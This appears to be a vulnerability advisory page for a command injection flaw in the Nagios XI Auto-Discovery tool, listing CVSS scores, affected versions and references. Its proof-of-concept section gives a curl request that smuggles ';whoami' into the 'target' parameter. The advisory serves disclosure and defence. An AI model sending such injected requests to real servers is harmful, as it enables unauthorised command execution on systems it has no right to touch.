Security Vulnerability Report

CVE-2013-10073 CVSS 8.8 HIGH

Published: 2025-10-30 22:15:36
Last Modified: 2025-11-06 16:24:11

Description

Nagios XI versions prior to 2012R1.6 contain a shell command injection vulnerability in the Auto-Discovery tool. User-controlled input is passed to a shell without adequate sanitation or argument quoting, allowing an authenticated user with access to discovery functionality to execute arbitrary commands with the privileges of the application service.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector (v3.1, primary)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Vector (secondary)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 4.0 Score
8.7 HIGH
Weakness
CWE-78 (OS Command Injection)

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* (versions before 2012) - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2012:r1.0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2012:r1.1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2012:r1.2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2012:r1.3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2012:r1.4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2012:r1.5:*:*:*:*:*:* - VULNERABLE
Summary: Nagios XI < 2012R1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
shell
curl -X POST 'http://target/nagiosxi/includes/discovery/autodiscovery.php' -d 'target=;whoami'

References

https://www.nagios.com/changelog/nagios-xi/ (Release Notes)
https://www.vulncheck.com/advisories/nagios-xi-auto-discovery-shell-command-injection (Third Party Advisory)